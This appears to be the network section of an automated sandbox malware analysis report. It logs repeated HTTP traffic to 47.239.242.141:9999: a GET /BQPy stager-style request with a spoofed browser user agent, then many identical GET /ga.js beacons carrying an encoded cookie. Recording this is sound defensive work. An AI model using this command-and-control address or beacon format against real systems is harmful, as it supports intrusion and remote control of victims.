Source: unknown	Network traffic detected: HTTP traffic on port 54367 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54367
Source: unknown	Network traffic detected: HTTP traffic on port 54368 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54368
Source: unknown	Network traffic detected: HTTP traffic on port 54369 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54369
Source: unknown	Network traffic detected: HTTP traffic on port 54370 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54370
Source: unknown	Network traffic detected: HTTP traffic on port 54371 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54371
Source: unknown	Network traffic detected: HTTP traffic on port 54372 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54372
Source: unknown	Network traffic detected: HTTP traffic on port 54373 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54373
Source: unknown	Network traffic detected: HTTP traffic on port 54374 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54374
Source: unknown	Network traffic detected: HTTP traffic on port 54375 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54375
Source: unknown	Network traffic detected: HTTP traffic on port 54376 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54376
Source: unknown	Network traffic detected: HTTP traffic on port 54377 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54377
Source: unknown	Network traffic detected: HTTP traffic on port 54378 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54378
Source: unknown	Network traffic detected: HTTP traffic on port 54379 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54379
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54380
Source: unknown	Network traffic detected: HTTP traffic on port 54381 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54381
Source: unknown	Network traffic detected: HTTP traffic on port 54382 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54382
Source: unknown	Network traffic detected: HTTP traffic on port 54383 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54383
Source: unknown	Network traffic detected: HTTP traffic on port 54384 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54384
Source: unknown	Network traffic detected: HTTP traffic on port 54385 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54385
Source: unknown	Network traffic detected: HTTP traffic on port 54386 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54386
Source: unknown	Network traffic detected: HTTP traffic on port 54387 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54387
Source: unknown	Network traffic detected: HTTP traffic on port 54388 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54388
Source: unknown	Network traffic detected: HTTP traffic on port 54389 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54389
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54390
Source: unknown	Network traffic detected: HTTP traffic on port 54391 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54391
Source: unknown	Network traffic detected: HTTP traffic on port 54392 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54392
Source: unknown	Network traffic detected: HTTP traffic on port 54393 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54393
Source: unknown	Network traffic detected: HTTP traffic on port 54394 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54394
Source: unknown	Network traffic detected: HTTP traffic on port 54395 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54395
Source: unknown	Network traffic detected: HTTP traffic on port 54396 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54396
Source: unknown	Network traffic detected: HTTP traffic on port 54397 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54397
Source: unknown	Network traffic detected: HTTP traffic on port 54398 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54398
Source: unknown	Network traffic detected: HTTP traffic on port 54399 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54399
Source: unknown	Network traffic detected: HTTP traffic on port 54400 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54400
Source: unknown	Network traffic detected: HTTP traffic on port 54401 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54401
Source: unknown	Network traffic detected: HTTP traffic on port 54402 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54402
Source: unknown	Network traffic detected: HTTP traffic on port 54403 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54403
Source: unknown	Network traffic detected: HTTP traffic on port 54404 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54404
Source: unknown	Network traffic detected: HTTP traffic on port 54405 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54405
Source: unknown	Network traffic detected: HTTP traffic on port 54406 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54406
Source: unknown	Network traffic detected: HTTP traffic on port 54407 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54407
Source: unknown	Network traffic detected: HTTP traffic on port 54408 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54408
Source: unknown	Network traffic detected: HTTP traffic on port 54409 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54409
Source: unknown	Network traffic detected: HTTP traffic on port 54410 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54410
Source: unknown	Network traffic detected: HTTP traffic on port 54411 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54411
Source: unknown	Network traffic detected: HTTP traffic on port 54412 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54412
Source: unknown	Network traffic detected: HTTP traffic on port 54413 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54413
Source: unknown	Network traffic detected: HTTP traffic on port 54414 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54414
Source: unknown	Network traffic detected: HTTP traffic on port 54415 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54415
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54416
Source: unknown	Network traffic detected: HTTP traffic on port 54417 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54417
Source: unknown	Network traffic detected: HTTP traffic on port 54418 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54418
Source: unknown	Network traffic detected: HTTP traffic on port 54419 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54419
Source: unknown	Network traffic detected: HTTP traffic on port 54420 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54420
Source: unknown	Network traffic detected: HTTP traffic on port 54421 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54421
Source: unknown	Network traffic detected: HTTP traffic on port 54422 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54422
Source: unknown	Network traffic detected: HTTP traffic on port 54423 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54423
Source: unknown	Network traffic detected: HTTP traffic on port 54424 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54424
Source: unknown	Network traffic detected: HTTP traffic on port 54425 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54425
Source: unknown	Network traffic detected: HTTP traffic on port 54426 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54426
Source: unknown	Network traffic detected: HTTP traffic on port 54427 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54427
Source: unknown	Network traffic detected: HTTP traffic on port 54428 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54428
Source: unknown	Network traffic detected: HTTP traffic on port 54429 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54429
Source: unknown	Network traffic detected: HTTP traffic on port 54430 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54430
Source: unknown	Network traffic detected: HTTP traffic on port 54431 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54431
Source: unknown	Network traffic detected: HTTP traffic on port 54432 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54432
Source: unknown	Network traffic detected: HTTP traffic on port 54433 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54433
Source: unknown	Network traffic detected: HTTP traffic on port 54434 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54434
Source: unknown	Network traffic detected: HTTP traffic on port 54435 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54435
Source: unknown	Network traffic detected: HTTP traffic on port 54436 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54436
Source: unknown	Network traffic detected: HTTP traffic on port 54437 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54437
Source: unknown	Network traffic detected: HTTP traffic on port 54438 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54438
Source: unknown	Network traffic detected: HTTP traffic on port 54439 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54439
Source: unknown	Network traffic detected: HTTP traffic on port 54440 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54440
Source: unknown	Network traffic detected: HTTP traffic on port 54441 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54441
Source: unknown	Network traffic detected: HTTP traffic on port 54442 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54442
Source: unknown	Network traffic detected: HTTP traffic on port 54443 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54443
Source: unknown	Network traffic detected: HTTP traffic on port 54444 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54444
Source: unknown	Network traffic detected: HTTP traffic on port 54445 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54445
Source: unknown	Network traffic detected: HTTP traffic on port 54446 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54446
Source: unknown	Network traffic detected: HTTP traffic on port 54447 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54447
Source: unknown	Network traffic detected: HTTP traffic on port 54448 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54448
Source: unknown	Network traffic detected: HTTP traffic on port 54449 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54449
Source: unknown	Network traffic detected: HTTP traffic on port 54450 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54450
Source: unknown	Network traffic detected: HTTP traffic on port 54451 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54451
Source: unknown	Network traffic detected: HTTP traffic on port 54452 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54452
Source: unknown	Network traffic detected: HTTP traffic on port 54453 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54453
Source: unknown	Network traffic detected: HTTP traffic on port 54454 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54454
Source: unknown	Network traffic detected: HTTP traffic on port 54455 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54455

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 47.239.242.141:9999

Source: Joe Sandbox View

ASN Name: CHARTER-20115US CHARTER-20115US

Source: global traffic	HTTP traffic detected: GET /BQPy HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: */*Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
